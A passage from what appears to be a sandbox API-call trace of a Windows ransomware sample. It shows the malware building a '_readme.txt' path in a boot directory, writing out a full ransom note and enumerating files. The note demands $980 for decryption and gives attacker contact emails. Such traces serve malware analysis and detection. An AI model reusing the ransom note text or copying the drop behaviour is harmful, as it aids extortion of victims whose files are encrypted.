returned="C:\\" [0184.259] PathFindFileNameW (pszPath="") returned="" [0184.259] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.260] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.260] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.260] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.261] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0184.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.261] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0184.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.263] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.263] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.263] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.264] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*" (normalized: "c:\\boot\\nl-nl\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.265] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.265] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.265] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.265] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.266] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.294] 